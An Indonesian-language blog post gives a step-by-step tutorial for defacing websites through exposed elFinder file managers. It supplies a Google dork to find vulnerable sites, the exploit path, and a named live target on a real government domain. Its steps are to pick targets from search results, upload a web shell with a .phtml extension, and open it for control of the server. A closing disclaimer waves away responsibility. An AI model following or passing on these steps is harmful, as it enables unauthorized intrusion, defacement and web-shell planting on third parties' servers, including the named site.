Tutorial Deface elFinder + Upload Shell

Posted on

Last Updated on 27/10/2018 by Mas Doni

Naufal Ardhani – Hallo gaess kali ini gua bakal bagiin Tutorial Deface elFinder + Upload Shell, Exploit ini sudah cukup lama ya tapi masih ada aja website yang masih vuln dengan exploit ini :v
dan pas gua lagi Pentest web http://labuankec.pandeglangkab.go.id/ gua nemuin directory /elFinder/ dan langsung aja gua upload shell dan bugnya dah ditambel.

Dork :

  • inurl:elfinder/elfinder.php.html ( dork kembangin lagi ya biar dapet yang vuln )
Exploit :
  • www.site.com/[path]/elfinder/elfinder.php.html
Live Target : http://labuankec.pandeglangkab.go.id/
Step :
  1. Dorking di google, pilih target dan kasih exploit satu satu
  2. dan Disini gua pake Live Target dan beri exploitnya : https://labuankec.pandeglangkab.go.id/SysAdminBasTek/scripts/elfinder/elfinder.php.html

  3. Langsung aja Upload Shell dengan ekstensi .phtml 
  4. lalu Akses deh Shellnya di www.site.com/[path]/elfinder/files/oxy.phtml
Sekian Tutorial Deface elFinder + Upload Shell semoga bermanfaat ilmunya.
nb : saya tidak bertanggung jawab atas apa yang kalian telah lakukan karna saya hanya membagikan ilmu untuk membantu admin web :3
See also  CamScanner Phone PDF Creator v5.5.1.20180307 [Full]

Leave a Reply

Your email address will not be published.